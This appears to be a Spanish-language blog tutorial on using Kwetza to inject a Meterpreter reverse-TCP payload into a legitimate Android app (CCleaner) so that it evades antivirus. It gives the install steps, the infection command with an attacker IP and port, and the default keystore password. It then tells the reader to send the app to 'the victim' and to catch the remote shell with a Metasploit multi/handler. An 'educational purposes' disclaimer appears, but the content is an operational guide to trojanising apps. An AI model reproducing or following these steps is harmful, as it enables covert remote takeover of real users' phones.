Kwetza Infectar Aplicaciones Android
Kwetza infecta una aplicación para Android existente con cualquiera de las plantillas de encargo o de carga útil por defecto para evitar ser detectados por los antivirus. Kwetza le permite infectar aplicaciones Android usando permisos predeterminados de la aplicación de destino o se inyecta permisos adicionales para obtener una funcionalidad adicional.
Primero colonas o descargamos la herramienta. https://github.com/sensepost/kwetza.git una vez clonada la herramienta procederemos a instalarla.
Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar utilizando Pip:
pip install beautifulsoup4
Cabe mencionar que la herramienta necesita apktool para su funcionamiento, lo aremos de la siguiente forma. vamos a la pagina para descargarlo apktool una vez descargada la última versión procedemos a descargar el siguiente archivo link lo guardamos como .txt "apktool.txt" el archivo .jar descargado lo remombraremos y le pondremos apktool.jar
una vez hecho esto lo copiamos a la siguiente ruta: /usr/local/bin luego daremos permisos a ambos archivos.
una vez hecho todo esto procedemos a ejecutar la herramienta abrimos una terminal y desde donde la clonamos o descargamos tecleamos lo siguiente. el comando para lanzar la aplicación es la siguiente:
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
solo sustituiremos valores de la siguiente forma: python kwetza.py ccleaner.apk 192.168.1.10 4444 yes ccleaner es la aplicación que yo elegí mi ip y el puerto a la escucha el "si " es para darle permisos adicionales a la aplicación final.
una vez hecho esto esperamos que la aplicación haga su trabajo hasta que te llegue hasta la siguiente linea Passphrase for keystore: la contraseña por defecto es "password".
una vez terminado el proceso ya tendremos la aplicación lista para mandársela a la victima "recuerden esto es con fines educativos" la aplicación se guardara en la siguiente ruta:
/root/Herramientas/kwetza/ccleaner/dist/ccleaner.apk "allí fue donde yo la instale y la aplicación que use" esto variara dependiendo de donde la guardaron.
ya realizado todo esto procedemos a configurar Metasploit,
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.10 "nuestra ip"
set lport 4444 "el que usamos para configurar la apk"
una vez hecho esto pues ponemos a la escucha nuestro payload por tener la sesión exitosa. Como vemos tenemos una sesión de meterpreter exitosa.
ya con esto que vuele nuestra mente recuerden es con fines educativos.
0 comentarios:
Publicar un comentario